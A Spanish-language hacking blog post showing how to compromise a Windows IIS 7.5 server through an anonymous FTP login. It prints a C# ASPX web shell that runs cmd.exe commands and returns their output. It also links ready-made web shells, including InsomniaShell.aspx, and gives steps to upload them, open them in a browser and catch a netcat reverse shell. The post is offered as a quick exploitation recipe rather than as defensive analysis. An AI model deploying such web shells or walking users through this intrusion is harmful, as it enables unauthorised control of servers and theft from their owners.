Exploiting, Hacking, Tools

Explotando un windows InsomniaShell.aspx

Print Friendly, PDF & Email

De como acabar Explotando un windows en menos de 5 minutos

Insomnia Shell y otras shells en asp

Tenemos un Windows con un servidor iss 7.5 en el cual se han dejado abierto un ftp sin eliminar el usuario anonymous.

Otra variante del ftp es que tengan un formulario que permita subida de ficheros.

Hay varias shells en aspx que nos van a  permitir ejecutar comandos dentro de la máquina.

Básicamente nosotros le decimos que nos devuelva un cmd algo así con un código similar a este pero recomiendo echar un ojo a las shell que se muestran más abajo:

public partial class cltest : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            System.Diagnostics.Process si = new System.Diagnostics.Process();
            si.StartInfo.WorkingDirectory = "c:\\";
            si.StartInfo.UseShellExecute = false;
            si.StartInfo.FileName = "cmd.exe";
            si.StartInfo.Arguments = "/c dir";
            si.StartInfo.CreateNoWindow = true;
            si.StartInfo.RedirectStandardInput = true;
            si.StartInfo.RedirectStandardOutput = true;
            si.StartInfo.RedirectStandardError = true;
            si.Start();
            string output = si.StandardOutput.ReadToEnd();
            si.Close();
            Response.Write(output);
        }
}

Sólo que en nuestro caso vamos a usar un par de shells ya codeadas, que dejo a continuación, mis agradecimientos a sus autores:

shells.aspx.tar

Comentar que de las dos shells la primera es muy cómoda para ejecutar comandos desde la web, la segunda, InsomniaShell.aspx se conecta en reverse contigo y escala.

Así que los pasos para hacerse con el control serían tan sencillos como:

  1. Subir la shell al ftp
  2. Acceder a la shell desde la web
  3. Crear una conexión en reverse  con netcat

Veámoslo en imágenes:

  1. Vemos el servidor iss

Nuestro Server

Tiene el ftp abierto con user anonymous por defecto, esto es muy común, o al menos mucho más de lo que debería, puede verse con un simple nmap -A -PN IP

Nos conectamos y subimos nuestras shells en un nuevo directorio llamado hcs:

Accedemos a nuestro directorio y nuestras shells mediante el navegador:

 

En el caso de esta shell nos resulta muy cómodo poder ver casi todos los ficheros del sistema y poder ejecutar ciertos comandos, aunque aún no somos root, no podremos aplicar permisos o cambiar atributos, pero si que podemos subir lo que queramos y ejecutarlo.

Bueno usemos Insomnia.aspx:

Configuramos nuestra máquina en la shell

Ponemos el puerto a la escucha y voíla!

 

Como plus añado un cheatsheet sacado de pentestmonkey por si ellos lo borraran y para añadirlo a nuestra colección.

Un saludo y disfrutad, ya sabeis lo barato sale caro en la mayoría de las ocasiones, incluso en tiempo, casi siempre lo libre es mejor que lo barato 😉

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *